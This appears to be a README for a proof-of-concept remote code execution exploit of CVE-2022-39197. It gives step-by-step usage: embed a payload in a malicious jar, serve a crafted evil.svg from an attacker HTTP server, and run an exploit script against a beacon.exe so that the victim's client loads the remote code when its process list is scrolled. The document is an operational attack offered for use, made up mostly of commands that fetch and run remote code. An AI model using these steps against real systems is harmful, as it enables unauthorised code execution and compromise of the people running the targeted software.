CVE-2022-39197 RCE POC
Usage
- Prepare Payload
- Edit
Line 19
with your payload inEvilJar/src/main/java/Exploit.java
- Build using jar
mvn clean compile assembly:single
- Move
EvilJar-1.0-jar-with-dependencies.jar
fromEvilJar/target/
toserve/
folder - Edit
serve\evil.svg
replace[attacker]
- Serve using
python3 -m http.server 8080
- Execute Exploit
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
Payload will be triggered as soon as the user scrolls through Process List
POC.JPG?
Reference Links
https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg โ Thereโs a great in depth analysis of this vulnerability https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html